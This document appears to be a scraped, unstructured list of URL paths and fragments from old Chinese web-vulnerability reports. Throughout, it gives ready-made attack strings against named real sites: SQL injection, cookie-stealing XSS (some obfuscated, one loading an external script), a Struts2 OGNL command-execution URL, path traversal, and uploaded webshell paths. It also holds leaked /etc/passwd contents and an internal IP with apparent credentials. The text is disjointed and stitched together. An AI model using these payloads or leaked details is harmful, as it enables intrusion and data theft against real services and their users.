/Manage/Login/UserLogin.aspx /Manage/Login/UserLogin.aspx /?action=user_center/orderStatus&todo=index&orderid=2058612 /attack.php /relation.do?action=follow /fuli/search.html?id=0&kw= www.nsw888.com的管理后台 gbk-*- /sub/huodong.html /sub/hd/vote_new.php /game/zhongkouwei/start/cid/566%20and%201=1 /game/zhongkouwei/start/cid/566%20and%201=2 /login_pass.aspx?go=%22%20onmouseover%3dprompt%28947212%29%20bad%3d%22 /index.aspx?UserId=lxj616 /Orders/OrderDetail.aspx?im=fd&oid=166002 /Orders/OrderDetail.aspx?im=zk&oid=166002 /pingji.php?id=6265 /admin /temp_private.php?choice=230 /login.php后台 /install/index /cdairportback/ /my/profile/email /select_lang.action /system.jsp /websitecelebrate /a49632/actimg/12anniversary/js/anniversary.js /SSOServer/SSO/SSOServer_newlogin.action /Article/html/3/62/2012/34272.htm www.53kf.com的网站找到类似于http://www.53kf.com/products/xxxxx.html //index.php?s=/Info/doIndex /1.html /showcommonposts.php?length=31&pagesize=7&fid=7 /showtopclicks.php?pagesize=7 /phpinfo.php /main/ask /10jup/vote/Pl.asp?id=1 /phpmyadmin/index.php /morenews.php?newstype=19 /admin /order/queryByUser.json?callback=x&startDate=2011-01-01&endDate=2012-12-11&status=-1&pageSize=1000¤tPag1 / /WEB-INF/ /index.php?r=site /wp/wp-login/ /wp/wp-admin/.svn/entries /index.php?m=event.modify&eid=5 /SWSJDomestic/DomesticTrade.action /space/addusertrr.jhtml?userid=57366852 /space/biuser/login.jsp?currentUrl=%22/%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E;// /complain/index.html /?action=route&id=329846&pdate= /main.php?do=user_do_change_password&old=123456&new=password&pwd_s=1 /main.php?do=user_do_change_password&new=password&pwd_s=1&old="+pass /?action=route&id=329846&pdate= www.your-site.com/1.js function(r) /relationFeedOper.do?action=addHigh&id=000000000 /feedprefs.do /feedprefs.do /relationFeedOper.do?action=addHigh&id=000000000 4}……而是……{code:0 /order/viewproduct/id/56455/ /order/viewproduct/id/56455%20and%201=1/ /order/viewproduct/id/56455%20and%201=2/ /admin/system/uploadfile.php?anyid=14&lang=cn&fileurl=templates得到路径 /templates/x.php /B2C/data/minorenterprises/getQuestionByUserId.xsql?userId=-1中参数userId未过滤实施注入。 /zhaopin/jobFront/jobFront!seeJobHisFront.action?id=1107 /zhaopin/upload/resumeimg/2012/12/a.jsp /php/zhidao1/edit_replyadd/ /product/getAllProductByQuYuBH.action /?umod=commentsoutlet&act=count&siteid=3&libid=9&dataid=1480&score=1&func=haoping&_=1353475261886 /?umod=commentsoutlet&act=count&siteid=3&libid=9&dataid=1480&score= /common/setParentsInfo.php?callback=aaaaaaaaa /common/setParentsInfo.php?callback=aaaaaaaaa /common/setParentsInfo.php?callback=eval('alert(1)');void /search.php?word=乌云欢迎您 /search.php?word=乌云欢迎您 /index.php?c=follow&a=index&appkey=801004516&bg=我是一个兵,爱国爱人民&hsize=80&name=Zhanglifenft,chengyizhong,xiangyang20112007,linchufang,leonardoit,linchufang,qingfengxu6685,zhouzhichen001,yuguoming-ruc,luomingtitan,bjwbgq,kezuozongbianji,weibotalk,lee007,jxzhongweizhi,lihaipengtx /index.php?c=follow&a=index&appkey=801004516&bg=;w:expr\65ssion\28%20eval\28\27\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\64\6f\63\75\6d\65\6e\74\2e\63\6f\6f\6b\69\65\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\7d\27\29\29&hsize=80&name=Zhanglifenft,chengyizhong,xiangyang20112007,linchufang,leonardoit,linchufang,qingfengxu6685,zhouzhichen001,yuguoming-ruc,luomingtitan,bjwbgq,kezuozongbianji,weibotalk,lee007,jxzhongweizhi,lihaipengtx auto;background-color:#我是一个兵,爱国爱人民 /report/search.php?searchtype_yjbg=yjjg&searchvalue_yjbg=aaaaaaaaaa /report/search.php?offset='+this.value+'&searchtype_yjbg=yjjg&searchvalue_yjbg=aaaaaaaaaa'"/ /report/search.php?searchtype_yjbg=yjjg&searchvalue_yjbg=aaaaaaa%26%23x27;%2balert(1)%2b%26%23x27 location='http://stock.finance.qq.com/report/search.php?offset='+document.getElementById('pagenum').value+'&searchtype_yjbg=yjjg&searchvalue_yjbg=aaaaaaaaaa /jmx-console/HtmlAdaptor?action=displayMBeans /cmd/cmd.jsp x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:94:94:Distcache:/:/sbin/nologin x:16:16:Special /home/oprofile:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:67:67:Webalizer:/var/www/usage:/sbin/nologin x:100:101:OpenVPN:/etc/openvpn:/sbin/nologin x:23:23::/var/spool/squid:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:81:81:System /:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:101:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin x:102:106:ntop:/var/lib/ntop:/sbin/nologin x:42:42::/var/gdm:/sbin/nologin x:86:86:Sabayon /home/sabayon:/sbin/nologin /cgi-bin/qm_help_mailme?sid=,2,zh_CN&t=%22;alert(1);//aaaaaa /cgi-bin/qm_help_mailme?sid=,2,zh_CN&t=%c0%22;alert(1);//aaaaaa /bookfriend/home?wc=201212133 / /admin/ /yiliao/item.php?id=695 /chanel.php?id=14 / / / / www.dalibao.cn www.960961.cn www.960961.net www.960961.com www.960961.cn www.960961.net www.ocar.com.cn www.jslegal.com /cgi-bin/login?vt=passport&ss=aaa&from=bbb&delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dindex%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1 /cgi-bin/login?vt=passport&ss=\&from==0;alert(1);function/**/from(){};//&delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dindex%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1 /cgi-bin/mifiAjaxDeviceInfoGet.cgi /cgi-bin/mifiAjaxWizardGet.cgi /phpinfo.php /cgi-bin/search?libid=178&FilterAttrAND=3602&FilterValueAND=aaaaaaaaaa /cgi-bin/search?libid=178&FilterAttrAND=3602&FilterValueAND=%0aalert(1);// /855003310/?PTAG=33410.6.61 / /downloadPatch.do?pathName=../WEB-INF/web.xml /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../../../../data/ /skypearl/cn/toExchangeStandard.action /web/productAction!queryProduct.action?prodId=10077 /index.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|4,5,4,5&filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&tplname=centersearch.shtml&orderby=aaaaaaaaaaaa /index.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|4,5,4,5&filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&tplname=centersearch.shtml&orderby=aaaa%c0%5c%0aalert(1);// /emall/SNFlagShopSearch?storeId=10052&catalogId=10051&brandStroeGroupId=9067010209&shopCode=pioneer'INJECTED_PARAM /hoteltuan-web/index.htm?cityId=11'INJECTED_PARAM /Happigo.zip /reg.jsp /interface/album/album.php?ie=utf-8&op=0&type=1&name=%22%3E%3Cscript%3Ealert&rd=0.7457662494386118 /app/enter?appid=280383 /cgi-bin/search?libid=1&keyvalue=aaaaaaa&attr=133&stype=2&tname=star_second.shtml /cgi-bin/search?libid=1&keyvalue=\u003Cimg\u0020src=1\u0020onerror=alert(1)\u003e&attr=133&stype=2&tname=star_second.shtml /cgi-bin/search?libid=1&keyvalue=\x3Cimg\u0020src=1\u0020onerror=alert(1)\x3e&attr=133&stype=2&tname=star_second.shtml /user_index.php?action=creategroup /groupadmin.php?action=diyclassart&gid=3643&classid=3115 url(#default#AnchorClick) alert(1) alert(1)// expre\ssion(alert(1)) //frontend/holiday/holiday-auto!list.action /api/signApp.jsp /getUserRealAuthInfoByMe.action /newsn /zlxyAct!chushihua.action /fedemember/fedeMemberView.action?id=1319 /profile/contactInfo www.xxxxx.com网站存在XSS漏洞,点联系网站 /newsn /commonInter!taskInfo.action?jsoncallback=?&_dc=然后替换mac和id就可以了 /receiveScore.action?jsoncallback=jsonp1355490185120&category=0&type=0&mac={mac}&userID={id}&_dc=1355490149387&_=1355490149387 /com/js/manager.js /share/link?shareid=131326&uk=220764288 /iphone5/order.action /create-share/index.php?upd_id=xxx /i/MobileWap/login /m/login /upload/index.php/upload/user/apply /upload/uploads/1355631395_yijuhua.php / / /webcenter/xzspWebActionSubItemList.action?classValueId=4125&subName= / /abcProList!abcProDisplay.action?productId=32550&brandId=&expertId=411 //manage/jsp/user/login.jsp /frontend/groupbuying/order/grouporder!doQueryDetail.action?condition.id=$id /gywm/newsInfo!select.do /web/web/lanmu/lanmushow.asp?lei=%B9%E6%D5%C2%D6%C6%B6%C8 /index_nc?r[]=cookielist&e[]=mini_panel&s=mini&cb=any /2.html?name=shouzi&age=20 /2.html?name= /video/play_video.htm?sid=aaaaaa d27cdb6e-ae6d-11cf-96b8-444553540000 /pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0 /video/play_video.htm?sid=aaaaaa /video/play_video.htm?sid=aaaaaa /go/getflashplayer location.reload() /go/getflashplayer location.reload() d27cdb6e-ae6d-11cf-96b8-444553540000 /pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0 /go/getflashplayer /video/play_video.htm?sid=aaaaaa%22%3E%3C/object%3E%3Cimg%20src=1%20onerror=alert(1)%3E /video/play_video.htm?sid=aaaaaa /video/play_video.htm?sid=aaaaaa%22%3E%3C/object%3E%3Cimg%20src=1%20onerror=alert(1)%3E /logo/userlevel1_new.jpg /logo/user_new.jpg /logo/userlevel1_new.jpg /logo/user_new.jpg /phoneshop/ydkt/ /phoneshop/anquanqijisuanqi.shtml /fk/uploads/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@ /fk/uploads/dede /fk/uploads/data/enums/love.php 192.168.0.221 lp120 rgFv44b61kax lp120 www.xywy.com/zzk/zzkapp/sql/zzkclass.sql www.xywy.com/zzk/zzkapp/sql/zzkinfo.sql www.xywy.com/zzk/zzkapp/sql/buwei.sql none /qq/j.php?path=http://test.com/qq/&r='+Math.random() schemas-microsoft-com:vml url(#default#vml);position:absolute;width:90%;height:200% /qq/qq.vml#qq 100%;width:100% url(#default#vml),利用得先发一封邮件,等用户回复之后,再发送跨站邮件即可跨站成功! none /'+'/test.com/js.js?'+Math.random() /get_password.html /gxmh/ /gxmh/MdyRegInfo.aspx?uid=2059 /gxmh/MdyRegInfo.aspx?uid=2060 /gxmh/MdyRegInfo.aspx?uid=1 www.fjdpc.gov.cn /gxmh/home.aspx /sxtag/index.action /index.php?mod=members&do=detail&id=55 /index.php?mod=members&do=detail&id=55%20anD%201%3D1 /index.php?mod=members&do=detail&id=55%20anD%201%3D11 /web-console/ /web-console/ /web-console/ /jsp/system/ /search_app.shtml?key=aaaaa /search_app.shtml?key;alert(1);//=aaaa /search_app.shtml?key=aaa";alert(1);// /cheguansuo/homePage.action /www.114mall.com.cn.rar /public/detail.php?id=54536 221.122.40.14----- / / / / / / / / / / / / / / / / / alert(1) msgbox(1) text/html text/html,<script>alert(1)</script> /appweb/tools/tool-detail.shtml?turl=aaaaaa&gid=yl&cid=68&from= /appweb/tools/tool-detail.shtml?turl=javascript:alert(1);&gid=yl&cid=68&from= /appweb/tools/tool-detail.shtml?turl=vbscript:msgbox(1)'&gid=yl&cid=68&from= /appweb/tools/tool-detail.shtml?turl=data:text/html /index.php /ajax/json/pushfeed/pushfeed /tj8ke /searchResult.html?searchstr=%E2%80%9D%3Cscript%20src=%22http://xsscn.sinaapp.com/?u=8349dd%22%20%3E%20%3C/script%3E%3C!-- /126.am/Zj84p4 /Zj84p4 /comm_json?callback=commentListCallBack&dtag=1&ac=1&cluster=1&sellquality=0&NewProp=&Property=256&PageNum=1&PageSize=48&OrderStyle=80&Address=&SaleType=1°ree=1&AuthType=2&BeginPrice=&EndPrice=&KeyWord=2012%20%D0%C2&OnlineState=2&Paytype=4&ranking=&sClassid='aaaaaaaa&t=1354854681 /comm_json?callback=alert(1) /search_list.shtml?type=&callback=alert(1);&np=11&pro=256&searchtype=2&cs=0010000&keyword=&PTAG=20058.13.13 /search_list.shtml?type=%26callback=alert(1);&np=11&pro=256&searchtype=2&cs=0010000&keyword=&PTAG=20058.13.13 /js/search.js?t=20121108 /search_list.shtml?type=213280&np=11&pro=256&searchtype=2&cs=0010000&keyword=%26callback=eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41));void&PTAG=20058.13.13 /newsread.php?newid=483 /help_detail.aspx?id=43 /?id=1 /?id=1 /?id=1 /?id=1 /?id=1 /?id=(1)and'r'= /?id=1 /?id=(1)union www.wtf.tk/Pages/Index.aspx?id=1+and+1=1 www.wtf.tk/test/..\Pages/Index.aspx?id=1+and+1=1 /elibregister/commonRegister.aspx /upload/snsinfo/20121219161451_9091.jpg/x.php /chaxun.html /chaxun.php?cardNumber=+861454009xxxx(上网卡号码) /hskxread.php?id=1638 / /ward/main.jsp /wbep/ / / /Config.inc /user!login.action /user!login.action /t35/apps/opent/js/widget/share_btn_iframe.js /A1/weiboshare.html?url=&count=3 /)存在SQL输入库文件下载 /data.sql /webmail/optionForward.do /file/zwzwdel-File.shtml?para.qualifications_id="+annex_code.value+"&para.company_code="+company_code.value /slpgadmin/index.php?s=/Learn/c_category_edit/id/499/ /slpgadmin/index.php?s=/Learn/ /index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D /activity/201205_fab/index.php?action=news_detail&id=107710 /campaign.php?id=494 /uploadServer/jsp/debug.jsp /avatar/index/interact?origin=***&from=*** /user/eems/index.htm /user/EnergyInsight/index.htm /ad.php?id=18 / /1686789955 /dc/uninstall.php?000001 /wwwroot.rar / /reg_success/?m=XXX@sina.com&r=1 /cbscms/admin/login!login.do / www..com /FCKeditor/editor/filemanager/browser/default/connectors/test.html /miniportal/static/taoge_v2/album/59/ucc_album_21898659.html?tn=%3Cimg/onerror=alert(document.cookie)%20src=1%3Epkavoverx&ptid=1&tid=27 /awaP /payState.aspx?payID=2012122051180386 /index.php?hostID=1 /topic.php?channelID=9&topicID=40 /topic.php?topicID=40&channelID=9 /ppweb/zhaotb/qualapprfile/qualapprfileFrame.jsp?qualapprfile=1179811000000000A34E /)采用的存在SQL注入漏洞的老ShopEx /shopadmin/index.php?ctl=passport&act=login。就不登录后台了,点到为止。 /connect.php?receive=yes&mod=login&op=callback&referer=aaaaaaaaaaa&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772×tamp=1354305802 /./aaaaaaaaaaa /./a' /./a\u0027 /connect.php?receive=yes&mod=login&op=callback&referer=a\u0027;alert(document.cookie);a=\u0027&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772×tamp=1354305802 alert(document.cookie) /./a'.replace(/.+/,/javascript:alert(document.cookie)/.source);// /./a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);// /connect.php?receive=yes&mod=login&op=callback&referer=a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);//&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772×tamp=1354305802 / /web2/login_template/9.html /opt/webimlive.action /去里面买吃的看见有个监督投诉就试了下盲打 / / /user/user/set /404-2.gif /distribution/comments.php?width=1000&url=test',%20 / /Products/index/id/4%20and%201=2%20union%20select%201,2,3,4,user%28%29-- /console/ /careertest/usercreate.php?id=4456785 /php/report/archive/global_addressbook.php?uid=&domain=wanda.com.cn&skin=current /showjoblist.php?divid=4087934 /useradmin/SMSDetail.aspx?ID=1901,如下图所示: /useradmin/LinkArticleShow.aspx?id=8进行常规and /AutoRedirect.aspx?source=123&url=http://www.baidu.cn?zhongmin.cn /activeQQ/activate/image.jsp?qq=314487651&extend=http%3A%2F%2Fvc.gtimg.com%2FO1D59WST5GMZYDKBSJ7GS34Z1EYY11PF&r_sid=O1D59WST5GMZYDKBSJ7GS34Z1EYY11PF&imgType=gif%22%3E%3Cimg%20src='x'%20onerror='alert(1);'/%3E&i_p_w=imgType%7C /view/yanduan.php?type=36 /webalizer/ /webalizer/usage_201209.html /hi365/himanager/ qq.com swf qq.com swf xml /liveportal_v1/swf/carousel.swf?v=20101111&dp=http://v.qq.com/doco/pic.xml /doco/pic.xml这个XML文件的数据,为了看看是什么数据,我们可以使用抓包软件【这里我使用的是charles /doco/pic.xml的内容,对应着FLASH来看。 alert(1) alert(1) /doco/pic.xml /liveportal_v1/swf/carousel.swf /pic.xml /category-yigui/mcat0-scat0-b0-max0-min0-attr-page-1-sort-sort_order-order-asc.html?keywords=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E /lishui/goods.html?act=goods®ion_id=134&eid=109 /search.html?keywords=a /css/myquery/queryWQSBill.action String=root.loaderInfo.parameters.func /xxx.swf?func=newalert /xxx.swf?func= /swf/swfupload.swf /swf/swfupload.swf?movieName=aaaaaaaa /swf/swfupload.swf?movieName=aaa /sheport//pub/rigister/showServiceArticle.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ls\40\u002dl\40../webapps\'')(d))&(h) /UserSetting.php?r=b / /default5.aspx访问,发现只需要用户名和密码就能进行登录认证了,此处可用brute /bm_main.aspx?xh=jwc /index.php?mod=search&type=data&site=digi&libid=2&curpage=1&filterattr=115%7C138,138&filtervalue=a%A3%A8%C6%BB%B9%FB%A3%A9%7C3000-3500,3500-4000&orderby=F13%20desc&pagenum=30&tplname=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd x:25:25:Batch /var/spool/atjobs:/bin/bash x:1:1:bin:/bin:/bin/bash x:2:2:Daemon:/sbin:/bin/bash x:40:49:FTP /ftp:/bin/bash x:12:100:Games /var/games:/bin/bash x:101:102:User /var/run/hal:/bin/false x:4:7:Printing /var/spool/lpd:/bin/bash x:8:12:Mailer /var/spool/clientmqueue:/bin/false x:100:101:User /var/run/dbus:/bin/false x:65534:65533:nobody:/var/lib/nobody:/bin/bash x:74:103:NTP /var/lib/ntp:/bin/false x:51:51:Postfix /var/spool/postfix:/bin/false x:26:26:PostgreSQL /var/lib/pgsql:/bin/bash x:0:0:root:/root:/bin/bash x:71:65:SSH /var/lib/sshd:/bin/false x:102:104:Novell /var/lib/YaST2/suse-ncc-fakehome:/bin/bash x:30:8:WWW /var/lib/wwwrun:/bin/false x:30:8:WWW /bin/false x:13:62:Manual /var/cache/man:/bin/bash x:9:13:News /etc/news:/bin/bash x:10:14:Unix-to-Unix /etc/uucp:/bin/bash x:1000:100::/home/webdev:/bin/bash dev_samhe:x:1001:100::/data/dev_samhe:/bin/bash x:1002:100::/data/webroot:/bin/bash /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /docs.jsp?flag=http://madman.in /shouji/?prod=--%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,alert(1)%3E%3C/script%3E /.svn/entries /a/CVS/Root /CVS/Root /server-status /tools/phpinfo.php /info.php /login.aspx /login.asp /download/zt.php?tid=390&rid=406 /zt.php?tid=390 /2012/amie/index.php?aid=145725 /space.php?uid=16971&t=6 /zj/admin'%20and%20'a'='a /zj/admin'%20and%20'a'='b /search.php?search_key=%D3%A6%D3%C3%C9%CC%B5%EA%27 551dde4834fd237b:localhost 730aa64a06767383:localhost pintui_localhost:6e1b14bb4d2d70c7:% /XXXXXX /main.action /login.aspx /index_admin.asp?uid=admin /User/huiyuan_add.aspx /User/huiyuan.aspx /zhuanti/more.php?cid=2884 /zhuanti/more.php?cid=2884 /seeyon/index.jsp /login.aspx /a/?aid=150630 /?type=2193 /zt.php?tid=933&rid=956 /space.php?uid=16971'&p=1&t=1 /space.php?uid=16971&p=1&t=1 /b/?aid=5725 /pl/?aid=150630 /more/index.php?cid=2692'&p=1 /php/_article_right.php?cid=2189 /zhuanti/2012nmac/all.php?search=88952634 /edm_sub_1.php /expert/login/LoginSubmit.do /expert/login/Remix.do /2012/amie/index.php?aid=145725 /2012/amie/index.php?aid=145725 551dde4834fd237b:localhost 730aa64a06767383:localhost pintui_localhost:6e1b14bb4d2d70c7:% qq.com swf xml /qzone_v4/2/default_menu_horizontal.swf?xml_path=http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml /qzone/client/custom_menu/custom_menu.xml里是个什么内容。 /qzone/client/custom_menu/custom_menu.xml。 /qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml /qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml /login.php /?src=DHN-kz-mid04 /item.htm?id=16080191711 /search?lm=0&rn=10&pn=0&fr=search&ie=gbk&word=%3CSCRIPT+Language%3D&f=sug www.shodanhq.com /member/baoming.php?eventid=6%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,version%28%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 /s361935980.html,对文章进行评论时,选择“PK辩论”,在添加辩论话题时存在XSS漏洞。 / /qzone/v6/custom/custom_module_proxy.html#siDomain=1&g_StyleID=aaaaaaaaaa /qzone_v6/gb/skin/'+g_StyleID+'.css /qzone_v6/home_normal.css /qzone/v6/custom/custom_module_proxy.html#siDomain=1&g_StyleID= /qzone/v6/custom/custom_module_proxy.html#siDomain=1&g_StyleID= /blog/ /php/login?game=roco&uin= /tcss.ping.js /php/login?game=roco&uin= /?p=4&type=2832%22%20onmouseover%3dprompt(988413)%20bad%3d%22 /?type=2757'%20onmouseover%3dprompt(960738)%20bad%3d /getpassword.aspx /wap/scenery/OrderDetail_T13010109930.html?auth=pjrG_lL4sHFHJsvnLTdvuQ2&refid=2480279 /BofSLj /CWISEj / /news.php?id=124 /cli.cgi?cmd=echo%20账号:%;$poe_user%;echo%20密码:%;$poe_pass% /html.php?id=565%20and%201=1 /html.php?id=565%20and%201=2 /user.php?uid=xxx /search/ajax/search_result/ /question/395 /uploads/questions/20120607/bd0aacaa686c1249d965c6cec9d10cf5.zip /wenda/system/unset.php?a=1&b=2 /wenda/system/unset.php?GLOBALS[a]=1&b=2 /content/1872 /bjxf_public/toRecheckQueryPortal.action / schemas-microsoft-com:vml url(#default#vml);position:absolute;width:100%;height:100% /shouzi.vml#xss /app/papers /ft/question.fb?pid=3&cid=33518893&type=0&pno=%22%3E%3Ciframe%20src=%22javascript:alert%28document.cookie%29;%22%3E /interface/mail?m=set_send&mail=***********@qq.com&jsoncallback=jsonp1356855966584 /AirChargeWeb/login!login.action d27cdb6e-ae6d-11cf-96b8-444553540000 /qzone/client/photo/swf/vphoto.swf /qzone/client/photo/swf/vphoto.swf d27cdb6e-ae6d-11cf-96b8-444553540000 /vphoto.swf /vphoto.swf d27cdb6e-ae6d-11cf-96b8-444553540000 d27cdb6e-ae6d-11cf-96b8-444553540000 /qzone/client/photo/swf/vphoto.swf /qzone/client/photo/swf/vphoto.swf /qzone/client/photo/swf/vphoto.swf d27cdb6e-ae6d-11cf-96b8-444553540000 /qzone/client/photo/swf/vphoto.swf /qzone/client/photo/swf/vphoto.swf d27cdb6e-ae6d-11cf-96b8-444553540000 /qzone/client/photo/swf/vphoto.swf /qzone/client/photo/swf/vphoto.swf /settings/bindemail /gwcx/informationAction.do?m=loaddetail&id=13564925723197B3925492345F5F24E6614FB90073C58 /shopunion/list.php?kwd=1'and blank有同样功效,可以继承effective /submit/authmail/ /club/bbs-post-run?fid=208&oid=1005100210001,如图: /club/read-353489-1,如图: /club/bbs-post-modify?tid=353489&pid=0,触发xss。如图: /club/bbs-post-run?fid=208&oid=1005100210001。插入超链接,在插入链接的说明出,未过滤,导致xss。如图: /setting/change-email /bar/open/dongman http://58.215.169.240 http://passport.note.sdo.com/bin.zip //admin.qianpin.com/zxsale-sys2/portal/login.action同样可以得到千品网商户管理后台,这就有的发现喽。。。 http://home.woool.sdo.com/admin/admin.rar /app/v1.0/save_refund_list.cgi?e_time=%E9%80%89%E6%8B%A9%E6%97%A5%E6%9C%9F&time_type=0&s_time= /app/v1.0/save_refund_list.cgi?s_time=%E9%80%89%E6%8B%A9%E6%97%A5%E6%9C%9F&time_type=0&&e_time /show/product/plist.shtml?maintype=%E6%9C%BA%E6%A2%B0%E8%AE%BE%E5%A4%87&page=1&subtype=%E7%94%B5%E5%B7%A5%E7%94%B5%E5%99%A8%E6%88%90%E5%A5%97%E8%AE%BE%E5%A4%87&type=1 www.8809.cn /show/userinfo/selectuserinfo.shtml?describe=5201314%27+and+%271%27=1&index=1&size=8 /show/userinfo/selectuserinfo.shtml?describe=5201314%27+and+%271%27=%271&index=1&size=8 /2pdf/down.aspx?fn=/down/2013/x/xx/xxx/xxxxx.pdf /cloud/appdetail?type=2&appid=256715 /cloud/appdetail?type=2&appid=256718 /item.htm?spm=a1z10.3.4002-193867489.10.9mUiIn&id=20606632133 /Login.aspx /list.php?p=9&category=3 /upload/images/40906054/1331868269065_1.xls / /guest/register?type=retrieveUserCode /wap.at-gou.com/view.php?id=170 /wap.at-gou.com/view.php?id=170 /wap.at-gou.com/view.php?id=170 /wap.at-gou.com/view.php?id=170 /trade.php?tradecode=databack&filename=/../mod/system/set/trade/softset.php /index.php?_m=tickets&_a=submit /upload/addpic?callback=parent;prompt(/test/);//&code=3002 /magic/brand/1qi?keyword=1%3C%2ftitle%3E%3Cscript%3Eprompt%28document.cookie%29%3C/script%3E /2013/01/05/146/13573533461773126m.jpg /Du8ka9?'+Math.random();document.body.appendChild(s) /2013/01/05/146/13573533461773126m.jpg /Du8ka9?'+Math.random();document.body.appendChild(s) /NAVIERR.HTM#-2146697211#https://mail.qq.com/cgi-bin/loginpage /qq.php /fanliduo.zip /fanliduo.zip var PageData.tbs,kw:PageData.forum.name,fid:PageData.forum.id,tid:prompt("帖号"),pid:prompt("楼层pid"),word:option_editor.userInfo.user_name};$.post var PageData.tbs,kw:PageData.forum.name,fid:PageData.forum.id,tid:prompt("请输入要恢复的帖号"),pid:prompt("请输入要恢复的楼层pid"),word:option_editor.userInfo.user_name};$.post("/f/commit/post/delete/cancel",c);void /space/Group/MyGroupList.aspx /space/Group/Album.aspx?groupid=24936 /space/group/Events.aspx?groupid=24936 /space/group/CreateTree.aspx?groupid=24936 /space/group/Contact.aspx?groupid=24936 145px 145px url(Images/DL.jpg) 82px 32px /doLogin.aspx?UserID=admin'--&PWD=123 /smsweibo/index.php/wap/pay/goto_bank?fee=15 /snap.cgi?d=1747679200769378085&w=%A1%BE%BE%AB%BB%AA%A3%AC%BB%F0%A1%BF%D3%D0%CD%BC%D3%D0%D5%E6%CF%E0%A3%AC%B7%C7%C4%E3%C4%AA%CA%F4%CF%D6%B3%A1%A3%AC%B0%D4%C6%F8%CD%FE%CE%E4%A3%AC%B8%F8%C1%A6%B0%A1%A3%A1&u=http://feinimoshu.dajie.com/discuss/topic/162247/detail /2013/01/04/117/13573151176041810m.png /6Y3Mpn?'+Math.random();document.body.appendChild(s) /shop/507560/review_more 